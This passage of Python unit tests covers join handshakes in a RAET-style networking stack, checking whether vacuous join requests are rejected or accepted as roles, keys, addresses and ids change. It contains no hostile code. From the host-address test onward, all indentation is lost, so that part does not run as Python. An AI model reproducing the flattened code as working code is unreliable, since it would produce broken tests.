    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectSameRoleKeys(self):
    '''
    Test joinent rejects vacuous join request with same role and keys but not sameall (C1)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectSameRoleKeys.__doc__))
    # Setup: no auto-accept of keys; alpha is mutable.
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    alpha.mutable = True
    # Vacuous join: beta's remote for alpha carries fuid=0 and sid=0.
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Not ephemeral: alpha already knows beta by name with its keys.
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Mark beta's role as rejected in alpha's keep.
    alpha.keep.rejectRemote(alphaRemote)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Flip beta's main flag: role and keys still match (sameRoleKeys) but
    # the estates are no longer sameall, so the rejection must stand.
    self.assertIs(beta.main, None)
    beta.main = True
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Expect: reject; alpha clears its remote, beta still holds one
    # remote with one outstanding transaction.
    for stack, count in ((alpha, 0), (beta, 1)):
        self.assertEqual(len(stack.transactions), count)
        self.assertEqual(len(stack.remotes), count)
        self.assertEqual(len(stack.nameRemotes), count)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # The dumped remote data was cleared ...
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # ... while the persisted (rejected) role data is untouched.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in (alpha, beta):
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousRejectedRejectSameAll(self):
    '''
    Test joinent rejects vacuous join request with same all from already rejected estate (C2)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousRejectedRejectSameAll.__doc__))
    # Setup: no auto-accept of keys; alpha is mutable.
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    alpha.mutable = True
    # Vacuous join: beta's remote for alpha carries fuid=0 and sid=0.
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Not ephemeral: alpha already knows beta by name with its keys.
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    # Mark beta's role as rejected in alpha's keep.
    alpha.keep.rejectRemote(alphaRemote)
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Nothing about beta changes (sameAll), yet the rejected role status
    # alone must cause the join to be refused.
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Expect: reject; alpha clears its remote, beta still holds one
    # remote with one outstanding transaction.
    for stack, count in ((alpha, 0), (beta, 1)):
        self.assertEqual(len(stack.transactions), count)
        self.assertEqual(len(stack.remotes), count)
        self.assertEqual(len(stack.nameRemotes), count)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # The dumped remote data was cleared ...
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # ... while the persisted (rejected) role data is untouched.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in (alpha, beta):
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousEphemeralRejectedRejectSameall(self):
    '''
    Test joinent rejects vacuous ephemeral join from already rejected estate (C3)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousEphemeralRejectedRejectSameall.__doc__))
    # Mode: Never, Once
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    self.join(beta, alpha)
    # Status: Rejected
    # FIX: wrap .values() in list() — on Python 3 dict.values() returns a
    # non-indexable view, so values()[0] raises TypeError. list(...) works
    # on both Python 2 and 3.
    alpha.keep.rejectRemote(list(alpha.remotes.values())[0])
    self.serviceStacks([alpha, beta], duration=3.0)
    # Ensure the next join would be ephemeral
    # FIX: assertEqual, not assertIs — identity on ints relies on CPython
    # small-int caching; equality is the intended check.
    self.assertEqual(len(alpha.remotes), 0)
    self.assertEqual(len(alpha.nameRemotes), 0)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Mutable: Either (use Yes, as most loyal)
    alpha.mutable = True
    # Name: Body
    # Main: Body
    # Kind: Body
    # RHA: Header
    # Nuid: Computed
    # Fuid: Header
    # Leid: 0
    # Reid: Header
    # Role: Body
    # Keys: Body
    # Sameness: sameAll
    alpha.clearStats()
    beta.clearStats()
    # Retry the vacuous ephemeral join; nothing about beta has changed,
    # but its role is already rejected on alpha
    self.join(beta, alpha)
    # Action: Reject, clear if Added
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 0)
        self.assertEqual(len(stack.nameRemotes), 0)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    self.assertIn('joinent_transaction_failure', alpha.stats.keys())
    self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
    self.assertIn('joiner_transaction_failure', beta.stats.keys())
    self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
    # Assert remote is cleared
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # Assert role/keys aren't touched
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousAcceptNewMain(self):
    '''
    Test joinent accept vacuous join with an updated main (D1)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewMain.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    alpha, beta = self.bootstrapStacks()
    # Mutable: Yes (alpha may update its remote from a non-sameall join)
    alpha.mutable = True
    # Vacuous: Yes
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                fuid=0, # vacuous join
                                sid=0, # always 0 for join
                                ha=alpha.local.ha))
    # Ephemeral: No Name (the name is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    alpha.keep.acceptRemote(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    oldMain = None
    newMain = True
    # Name: Old
    # Main: New (only beta's main flag changes => not sameall)
    self.assertIs(beta.main, oldMain)
    beta.main = newMain
    # Kind: Either
    # RHA: Either
    # Nuid: Computed
    # Fuid: Either
    # Leid: 0
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump (mutable alpha absorbs the new main flag)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIs(beta.mutable, None)
    self.assertTrue(alpha.mutable)
    # Remote changed (main flag) but role/keys are the same as the snapshot
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.main, newMain)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump matches the updated in-memory remote
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump is still accepted with the same keys
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousAcceptNewKind(self):
    '''
    Test joinent accept vacuous join with updated application kind (D2)
    '''
    console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewKind.__doc__))
    # Setup: auto-accepting stacks with alpha mutable.
    alpha, beta = self.bootstrapStacks()
    alpha.mutable = True  # Mutable: Yes
    # Vacuous join: beta's remote for alpha carries fuid=0 and sid=0.
    betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0,  # vacuous join
                                                      sid=0,  # always 0 for join
                                                      ha=alpha.local.ha))
    # Not ephemeral: alpha already knows beta by name and has accepted it.
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    alpha.addRemote(alphaRemote)
    alpha.keep.acceptRemote(alphaRemote)
    # The persisted role must already reflect the accepted keys.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Beta changes only its application kind: not sameall, but a mutable
    # alpha should absorb the update and accept the join.
    priorKind = None
    updatedKind = 33
    self.assertIs(beta.kind, priorKind)
    beta.kind = updatedKind
    snapshot = self.copyData(alphaRemote)
    # Run the join transaction.
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Expect: accept and dump on both sides.
    for stack in (alpha, beta):
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIs(beta.mutable, None)
    self.assertTrue(alpha.mutable)
    # The remote changed (kind) while role and keys stayed the same.
    self.assertFalse(self.sameAll(alphaRemote, snapshot))
    self.assertTrue(self.sameRoleKeys(alphaRemote, snapshot))
    self.assertEqual(alphaRemote.kind, updatedKind)
    for stack, stat in ((alpha, 'join_correspond_complete'),
                        (beta, 'join_initiate_complete')):
        self.assertIn(stat, stack.stats)
        self.assertEqual(stack.stats[stat], 1)
    # The dumped remote matches the updated in-memory remote.
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # The dumped role is still accepted with the same keys.
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in (alpha, beta):
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentVacuousAcceptNewRha(self):
'''
Test joinent accept vacuous join with updated remote host address (D3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.ha, newHa)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewFuid(self):
'''
Test joinent accept vacuous join with an updated fuid (D4)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: 0
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.fuid, newFuid)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewKeys(self):
'''
Test joinent accept vacuous join with an updated keys (D5)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Accept and dump the remote role to achieve the following:
# Status: Accepted
# Role: Old
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.verfer.keyhex, beta.local.signer.verhex)
self.assertEqual(alphaRemote.pubber.keyhex, beta.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptNewRole(self):
'''
Test joinent accept vacuous join with an updated role (D6)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Yes
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure old remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new remote role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(beta.mutable, None)
self.assertTrue(alpha.mutable)
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousAcceptSameAll(self):
'''
Test joinent accept vacuous non-ephemeral join with same all values (E1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: Either (use No)
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.acceptRemote(alphaRemote)
# Ensure remote role is accepted
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Set to most strict auto mode
alpha.keep.auto = raeting.AutoMode.never.value
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Computed
# Fuid: Old
# Leid: 0
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, No Change
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousEphemeralAcceptSameall(self):
'''
Test joinent accept vacuous ephemeral join from already accepted estate with same all (E2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousEphemeralAcceptSameall.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
